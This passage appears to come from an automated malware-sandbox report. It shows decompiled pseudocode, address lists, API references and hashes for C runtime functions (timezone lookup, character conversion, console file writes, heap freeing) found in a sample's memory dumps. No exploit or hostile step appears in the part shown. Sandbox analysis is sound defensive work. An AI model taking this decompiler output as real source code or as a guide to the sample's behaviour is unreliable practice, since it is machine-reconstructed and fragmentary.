								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}

0x105d3afc
0x105d3afc
0x105d3b06
0x105d3b0b
0x105d3b0f
0x105d3b11
0x105d3b19
0x105d3b24
0x105d3cc4
0x105d3cc6
0x105d3cc7
0x105d3cc8
0x105d3cc9
0x105d3cca
0x105d3ccb
0x105d3cd0
0x105d3cd4
0x105d3cd6
0x105d3cd9
0x105d3ce0
0x105d3ce7
0x105d3ceb
0x105d3cee
0x105d3cf1
0x105d3cf6
0x105d3cf7
0x105d3cf9
0x105d3e21
0x105d3e21
0x105d3e22
0x105d3e23
0x105d3e24
0x105d3e25
0x105d3e26
0x105d3e2b
0x105d3e2e
0x105d3e2f
0x105d3e3e
0x105d3e41
0x105d3e4e
0x105d3e55
0x105d3e56
0x105d3e57
0x105d3e5d
0x105d3e6c
0x105d3e73
0x105d3e7b
0x105d3e7d
0x105d3e87
0x105d3e8a
0x105d3e97
0x105d3e9a
0x105d3e9c
0x105d3eb5
0x105d3ebd
0x105d3ebf
0x105d3ec5
0x105d3eca
0x105d3ec1
0x105d3ec1
0x00000000
0x105d3ec1
0x105d3e9e
0x105d3e9e
0x105d3e9f
0x105d3e9f
0x105d3e9f
0x105d3ecc
0x105d3e7f
0x105d3e7f
0x105d3e7f
0x105d3ed9
0x105d3edb
0x105d3edd
0x105d3edf
0x105d3eef
0x105d3eef
0x105d3ee1
0x105d3ee1
0x105d3ee4
0x00000000
0x105d3ee6
0x105d3ee6
0x105d3ee7
0x105d3eec
0x105d3ee4
0x105d3ef5
0x105d3f00
0x105d3f0b
0x105d3cff
0x105d3d03
0x105d3d08
0x105d3d09
0x105d3d0b
0x00000000
0x105d3d11
0x105d3d15
0x105d3d1a
0x105d3d1b
0x105d3d1d
0x00000000
0x105d3d23
0x105d3d29
0x105d3d2e
0x105d3d34
0x105d3d3b
0x105d3d41
0x105d3d44
0x105d3d4a
0x105d3d51
0x105d3d57
0x105d3d5b
0x105d3d61
0x105d3d64
0x105d3d6b
0x105d3d70
0x105d3d70
0x105d3d72
0x105d3d72
0x105d3d75
0x105d3d7c
0x105d3d94
0x105d3d94
0x105d3d97
0x105d3d7e
0x105d3d7e
0x105d3d83
0x105d3d85
0x00000000
0x105d3d87
0x105d3d89
0x105d3d8f
0x105d3d8f
0x105d3d85
0x105d3d9f
0x105d3db3
0x105d3db9
0x105d3dbb
0x105d3dc9
0x105d3dcb
0x105d3dbd
0x105d3dbd
0x105d3dc0
0x00000000
0x105d3dc2
0x105d3dc4
0x105d3dc4
0x105d3dc0
0x105d3de0
0x105d3de7
0x105d3de9
0x105d3df8
0x105d3dfb
0x105d3deb
0x105d3deb
0x105d3dee
0x00000000
0x105d3df0
0x105d3df3
0x105d3df3
0x105d3dee
0x105d3de9
0x105d3e05
0x105d3e0f
0x105d3e14
0x105d3e19
0x105d3e20
0x105d3e20
0x105d3d1d
0x105d3d0b
0x105d3b3c
0x105d3b3c
0x105d3b42
0x105d3b47
0x105d3b7d
0x105d3b7e
0x105d3b84
0x105d3b86
0x105d3b86
0x105d3b89
0x105d3b89
0x105d3b8b
0x105d3b8c
0x105d3b92
0x105d3b9d
0x105d3ba2
0x105d3ba7
0x105d3bb1
0x00000000
0x105d3bb7
0x105d3bb7
0x105d3bb9
0x105d3bba
0x105d3bba
0x105d3bbd
0x105d3bbd
0x105d3bbf
0x105d3bc0
0x105d3bc7
0x105d3bcc
0x105d3bd1
0x105d3bd6
0x105d3bde
0x105d3bdf
0x105d3be5
0x105d3bea
0x105d3bef
0x105d3bf5
0x105d3bfa
0x105d3bfb
0x105d3bfe
0x00000000
0x00000000
0x00000000
0x105d3bfe
0x105d3c03
0x105d3c04
0x105d3c09
0x105d3c0b
0x105d3c0b
0x105d3c13
0x105d3c19
0x105d3c1c
0x105d3c1c
0x105d3c20
0x00000000
0x00000000
0x105d3c2a
0x105d3c2a
0x105d3c2d
0x105d3c30
0x105d3c32
0x105d3c40
0x105d3c42
0x105d3c4c
0x105d3c4c
0x105d3c4e
0x105d3c50
0x00000000
0x00000000
0x105d3c47
0x105d3c49
0x105d3c4b
0x105d3c4b
0x00000000
0x105d3c4b
0x00000000
0x105d3c49
0x105d3c52
0x105d3c55
0x105d3c57
0x105d3c62
0x105d3c64
0x105d3c6e
0x105d3c6e
0x105d3c70
0x105d3c72
0x00000000
0x00000000
0x105d3c69
0x105d3c6b
0x105d3c6d
0x105d3c6d
0x00000000
0x105d3c6d
0x00000000
0x105d3c6b
0x105d3c6e
0x105d3c55
0x105d3c74
0x105d3c74
0x105d3c76
0x105d3c7a
0x105d3c7a
0x105d3c7f
0x105d3c81
0x105d3c84
0x105d3c87
0x105d3c89
0x105d3c8c
0x105d3ca4
0x105d3ca7
0x105d3caa
0x105d3cb2
0x105d3cb7
0x105d3cbc
0x00000000
0x105d3cbc
0x105d3c8e
0x105d3c93
0x105d3c96
0x105d3c9b
0x105d3c9e
0x105d3ca0
0x00000000
0x00000000
0x105d3ca2
0x105d3bef
0x00000000
0x105d3bd6
0x105d3b49
0x105d3b49
0x105d3b4b
0x105d3b4d
0x105d3b4d
0x105d3b51
0x00000000
0x00000000
0x105d3b55
0x105d3b69
0x105d3b69
0x105d3b57
0x105d3b57
0x105d3b57
0x105d3b5a
0x105d3b5d
0x00000000
0x105d3b5f
0x105d3b5f
0x105d3b62
0x105d3b67
0x00000000
0x00000000
0x00000000
0x00000000
0x105d3b67
0x105d3b5d
0x105d3b72
0x105d3b74
0x105d3cc3
0x105d3cc3
0x105d3b7a
0x105d3b7a
0x00000000
0x105d3b7a
0x00000000
0x105d3b74
0x105d3b6d
0x105d3b6f
0x105d3b6f
0x00000000
0x105d3b6f
0x105d3b47
0x00000000

APIs

_free.LIBCMT ref: 105D3B7E
_free.LIBCMT ref: 105D3BA2
_free.LIBCMT ref: 105D3D29
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045913C), ref: 105D3D3B
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 105D3DB3
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 105D3DE0
_free.LIBCMT ref: 105D3EF5

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: bb1c4e29ea3c94fde807ef6c64449600ee68293c17ee249133bd8b76597d27cb
Instruction ID: 2176ff76737f19d9f8c78926c456d7d053a40a1df018bbfacce2256aea4c8541
Opcode Fuzzy Hash: bb1c4e29ea3c94fde807ef6c64449600ee68293c17ee249133bd8b76597d27cb
Instruction Fuzzy Hash: 79C128B5900345AFD700DF6DCC45A9ABFB9EF81290F1485ABE490E73A2E7309E41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00448CA5, Relevance: 10.7, APIs: 7, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00448CA5(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E0043F348(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E0043F98C(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E004401F5(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x46a188; // 0x46a180
								 *_t133 = _t57;
								_t58 =  *0x46a18c; // 0x46b64c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x46a190; // 0x46b64c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x46a1b8; // 0x46a184
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x46a1bc; // 0x46b650
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E0043F98C(_t107, 4);
							_v20 = _t134;
							E004401F5(0);
							if(_t134 == 0) {
								L11:
								E004401F5(_v8);
								E004401F5(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E0044B0F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E0044B0F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E0044B0F4(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E0044B0F4(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E0044B0F4(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E00448C3C(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E004401F5(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x46a188;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E004401F5( *((intOrPtr*)(_t100 + 0x7c)));
							E004401F5( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}

0x00448ca5
0x00448cae
0x00448cb5
0x00448cb8
0x00448cc1
0x00448ce0
0x00448ce3
0x00448ce8
0x00448cef
0x00448d02
0x00448d03
0x00448d0c
0x00448d0e
0x00448d11
0x00448d14
0x00448d1a
0x00448d1d
0x00448d30
0x00448d38
0x00448e92
0x00448e95
0x00448e9a
0x00448e9c
0x00448ea1
0x00448ea4
0x00448ea9
0x00448eac
0x00448eb1
0x00448eb4
0x00448eb9
0x00448e22
0x00448e28
0x00448e2c
0x00448e2e
0x00448e2e
0x00000000
0x00448e2c
0x00448d45
0x00448d48
0x00448d4b
0x00448d54
0x00448de9
0x00448dec
0x00448df5
0x00000000
0x00448dfe
0x00448d5d
0x00448d62
0x00448d76
0x00448d8a
0x00448d96
0x00448da4
0x00448dbe
0x00448dda
0x00448e04
0x00448e17
0x00448e08
0x00448e0c
0x00448e7f
0x00000000
0x00000000
0x00448e81
0x00448e83
0x00448e86
0x00448e88
0x00448e8b
0x00448e12
0x00448e14
0x00448e16
0x00448e16
0x00448e16
0x00448e0c
0x00448e1c
0x00448e1f
0x00000000
0x00448e1f
0x00448ddf
0x00448de4
0x00000000
0x00448de8
0x00448d22
0x00000000
0x00448d2a
0x00000000
0x00448ccb
0x00448ccb
0x00448ccd
0x00448cd0
0x00448e30
0x00448e30
0x00448e38
0x00448e3a
0x00448e3a
0x00448e42
0x00448e47
0x00448e4b
0x00448e50
0x00448e5b
0x00448e61
0x00448e4b
0x00448e65
0x00448e6a
0x00448e70
0x00000000
0x00448e70

APIs

_free.LIBCMT ref: 00448D14
_free.LIBCMT ref: 00448D22
_free.LIBCMT ref: 00448E50
_free.LIBCMT ref: 00448E5B

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d6a22768136e8f975915bec0fd0b09f4a3547930ba585ec064c42673eecca047
Instruction ID: 5037293de4a8d99413730c47bb2bf79aa549f16360774897cc4c3b668a0cb580
Opcode Fuzzy Hash: d6a22768136e8f975915bec0fd0b09f4a3547930ba585ec064c42673eecca047
Instruction Fuzzy Hash: DE61C171900205EFEB20DF69C841BAEBBF4EF45710F24416FEA54EB241EB749D418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00442E63, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 171
timeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00442E63(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				signed int _v56;
				char _v268;
				intOrPtr _v272;
				char _v276;
				char _v312;
				char _v316;
				void* __ebp;
				void* _t36;
				signed int _t38;
				signed int _t42;
				signed int _t50;
				void* _t54;
				void* _t56;
				signed int* _t61;
				intOrPtr _t71;
				void* _t78;
				signed int _t85;
				signed int _t87;
				signed int _t89;
				int _t93;
				char** _t96;
				signed int _t100;
				signed int _t101;
				signed int _t106;
				signed int _t107;
				intOrPtr _t116;
				intOrPtr _t118;

				_t88 = __edi;
				_t96 = E004428CD();
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t36 = E0044292B( &_v8);
				_pop(_t78);
				if(_t36 != 0) {
					L19:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0043698A();
					asm("int3");
					_t106 = _t107;
					_t38 =  *0x46a00c; // 0xee31ea10
					_v56 = _t38 ^ _t106;
					 *0x46a344 =  *0x46a344 | 0xffffffff;
					 *0x46a338 =  *0x46a338 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t77 = "TZ";
					_t89 = 0;
					 *0x46b748 = 0;
					_t42 = E00439895(__eflags,  &_v316,  &_v312, 0x100, "TZ");
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E0043F98C(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E00439895(__eflags,  &_v276, _t101, _v272, _t77);
								__eflags = _t50;
								if(_t50 == 0) {
									E004401F5(0);
									_t89 = _t101;
								} else {
									_push(_t101);
									goto L25;
								}
							} else {
								_push(0);
								L25:
								E004401F5();
							}
						}
					} else {
						_t89 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t89 -  &_v268) & _t89;
					__eflags = _t89;
					if(__eflags == 0) {
						L33:
						E00442E63(_t77, _t89, _t100, __eflags);
					} else {
						__eflags =  *_t89;
						if(__eflags == 0) {
							goto L33;
						} else {
							_push(_t89);
							E00442C8E(_t77, _t89, _t100, __eflags);
						}
					}
					E004401F5(_t100);
					__eflags = _v12 ^ _t106;
					return E0042FD1B(_v12 ^ _t106);
				} else {
					_t54 = E004428D3( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E004428FF( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E004401F5( *0x46b740);
							 *0x46b740 = 0;
							 *_t107 = 0x46b750;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x46b750 * 0x3c;
								_t87 =  *0x46b7a4; // 0x0
								_push(__edi);
								 *0x46b748 = 1;
								_v8 = _t85;
								_t116 =  *0x46b796; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t87 * 0x3c;
								}
								_t118 =  *0x46b7ea; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x46b7f8; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t87) * 0x3c;
									}
								}
								_t93 = E0043F55B(0, _t87);
								if(WideCharToMultiByte(_t93, 0, 0x46b754, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t93, 0, 0x46b7a8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E004428C7()) = _v8;
							 *(E004428BB()) = _v12;
							_t61 = E004428C1();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

0x00442e63
0x00442e72
0x00442e79
0x00442e7d
0x00442e80
0x00442e83
0x00442e88
0x00442e8b
0x00442fb3
0x00442fb3
0x00442fb4
0x00442fb5
0x00442fb6
0x00442fb7
0x00442fb8
0x00442fbd
0x00442fc1
0x00442fc9
0x00442fd0
0x00442fd3
0x00442fe0
0x00442fe7
0x00442fe8
0x00442fea
0x00442fef
0x00442ffe
0x00443005
0x0044300d
0x0044300f
0x00443019
0x0044301c
0x00443029
0x0044302c
0x0044302e
0x00443047
0x0044304f
0x00443051
0x00443057
0x0044305c
0x00443053
0x00443053
0x00000000
0x00443053
0x00443030
0x00443030
0x00443031
0x00443031
0x00443031
0x0044305e
0x00443011
0x00443011
0x00443011
0x0044306b
0x0044306d
0x0044306f
0x00443071
0x00443081
0x00443081
0x00443073
0x00443073
0x00443076
0x00000000
0x00443078
0x00443078
0x00443079
0x0044307e
0x00443076
0x00443087
0x00443092
0x0044309d
0x00442e91
0x00442e95
0x00442e9a
0x00442e9d
0x00000000
0x00442ea3
0x00442ea7
0x00442eac
0x00442eaf
0x00000000
0x00442eb5
0x00442ebb
0x00442ec0
0x00442ec6
0x00442ed6
0x00442edc
0x00442ee3
0x00442ee9
0x00442eed
0x00442ef3
0x00442ef6
0x00442efd
0x00442f04
0x00442f04
0x00442f07
0x00442f0e
0x00442f26
0x00442f26
0x00442f29
0x00442f10
0x00442f10
0x00442f17
0x00000000
0x00442f19
0x00442f1b
0x00442f21
0x00442f21
0x00442f17
0x00442f31
0x00442f4d
0x00442f5d
0x00442f54
0x00442f56
0x00442f56
0x00442f7b
0x00442f8d
0x00442f82
0x00442f85
0x00442f85
0x00442f7b
0x00442f97
0x00442fa1
0x00442fa6
0x00442fab
0x00442fb2
0x00442fb2
0x00442eaf
0x00442e9d

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045913C), ref: 00442ECD
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00442F45
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00442F72
_free.LIBCMT ref: 00442EBB

Part of subcall function 004401F5: HeapFree.KERNEL32(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D

_free.LIBCMT ref: 00443087

Strings

~0D, xrefs: 00442CD4, 00442D58, 00442D72, 00442D9E, 00442DC5, 00442DEA, 00442E22, 00442E6C

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: ~0D
API String ID: 1286116820-265891634
Opcode ID: c3f2cfdb3fc9e5fdbcd299a8a699101136a47d9c1e3267c5a46447a5912354ea
Instruction ID: eaddca497d2d59ffe78ea95fbf6017cfb6659b3e69c1b97070d3f8b181497d44
Opcode Fuzzy Hash: c3f2cfdb3fc9e5fdbcd299a8a699101136a47d9c1e3267c5a46447a5912354ea
Instruction Fuzzy Hash: A8512871900209EBEB10EF65DD819AEB7BCEF40315B90027FF414D3291E7B89E859B99

Uniqueness

Uniqueness Score: -1.00%

Function 105D59DC, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E105D59DC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_v8 =  *0x46a00c ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x46b800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E105D0213(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x46b800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E105D449E( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E105D449E();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E105C0B89(_v8 ^ _t136);
			}

0x105d59eb
0x105d59ee
0x105d59f6
0x105d59fa
0x105d5a06
0x105d5a09
0x105d5a0c
0x105d5a13
0x105d5a1b
0x105d5a1e
0x105d5a24
0x105d5a2a
0x105d5a2f
0x105d5a31
0x105d5a34
0x105d5a39
0x105d5a43
0x105d5a4a
0x105d5a4d
0x105d5a54
0x105d5a5b
0x105d5a87
0x105d5aad
0x105d5aaf
0x00000000
0x105d5a89
0x105d5a8c
0x105d5b53
0x105d5b5f
0x105d5b6a
0x105d5b6f
0x105d5a92
0x105d5a99
0x105d5a9e
0x105d5aa4
0x105d5aaa
0x00000000
0x105d5aaa
0x105d5aa4
0x105d5a8c
0x105d5a5d
0x105d5a61
0x105d5a64
0x105d5a6a
0x105d5a6c
0x105d5a6f
0x105d5a73
0x105d5ab0
0x105d5ab3
0x105d5ab4
0x105d5ab9
0x105d5abf
0x105d5ac5
0x105d5ad4
0x105d5ada
0x105d5ae0
0x105d5ae5
0x105d5b01
0x105d5b74
0x105d5b7a
0x105d5b03
0x105d5b0b
0x105d5b14
0x105d5b1a
0x00000000
0x105d5b1c
0x105d5b1e
0x105d5b21
0x105d5b3a
0x00000000
0x105d5b3c
0x105d5b40
0x105d5b42
0x105d5b45
0x00000000
0x105d5b45
0x105d5b40
0x105d5b3a
0x105d5b1a
0x105d5b14
0x105d5b01
0x105d5ae5
0x105d5abf
0x00000000
0x105d5b48
0x105d5b48
0x105d5b7c
0x105d5b8e

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,105D6151,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 105D5A1E
__fassign.LIBCMT ref: 105D5A99
__fassign.LIBCMT ref: 105D5AB4
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 105D5ADA
WriteFile.KERNEL32(?,FF8BC35D,00000000,105D6151,00000000,?,?,?,?,?,?,?,?,?,105D6151,?), ref: 105D5AF9
WriteFile.KERNEL32(?,?,00000001,105D6151,00000000,?,?,?,?,?,?,?,?,?,105D6151,?), ref: 105D5B32

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 105b5f2bad96c86c2a1aea1fecdd32ae43e7a6c00a2812d1e525031561599e8b
Instruction ID: d827c3e8cb07e52e4d832b077e6708d385457dda52130806afdbef769c506573
Opcode Fuzzy Hash: 105b5f2bad96c86c2a1aea1fecdd32ae43e7a6c00a2812d1e525031561599e8b
Instruction Fuzzy Hash: FE519371900349AFDB00CFA8D885AEEBBF8EF09355F14416BE556E7351E770A940CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00444B6E, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00444B6E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x46a00c; // 0xee31ea10
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x46b800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x46b800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
